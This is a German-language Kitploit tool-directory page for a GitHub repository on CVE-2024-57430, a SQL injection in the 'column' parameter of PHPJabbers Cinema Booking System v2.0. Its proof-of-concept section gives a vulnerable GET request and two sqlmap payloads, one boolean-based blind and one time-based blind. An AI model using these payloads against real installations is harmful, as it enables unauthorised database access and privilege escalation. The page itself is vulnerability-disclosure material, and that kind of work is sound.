Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-57430 — CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 ist anfällig für SQL-Injection, was zu unbefugtem Datenzugriff und Privilegieneskalation führt. | Kitploit
Tools/GitHubGitHub/ahrixia/cve-2024-57430
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsDatenbanksicherheit
GitHubahrixia/cve-2024-57430

CVE-2024-57430

CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 ist anfällig für SQL-Injection, was zu unbefugtem Datenzugriff und Privilegieneskalation führt.

Repository anzeigen
10vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-57430

Eine SQL-Injection-Schwachstelle in der Funktion pjActionGetUser des PHPJabbers Cinema Booking System v2.0 ermöglicht es Angreifern, Datenbankabfragen über den Parameter column zu manipulieren. Die Ausnutzung dieses Fehlers kann zu unbefugter Offenlegung von Informationen, Rechteausweitung oder Datenbankmanipulation führen.

Verwundbarer Parameter: column

Auswirkungen:

SQL-Injection kann zu unbefugtem Zugriff auf vertrauliche Informationen, zur Veränderung der Datenbank und sogar zur vollständigen Übernahme des Datenbankservers führen. Dies stellt eine kritische Bedrohung für Vertraulichkeit, Integrität und Verfügbarkeit der Anwendung dar.

Exploit - Proof of Concept (POC)

SQL-Injection

GET-Anfrage an die URL: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10

SQLMAP auf column

Parameter: #1* (URI)
  Type: boolean-based blind
  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10

  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10
Tool herunterladen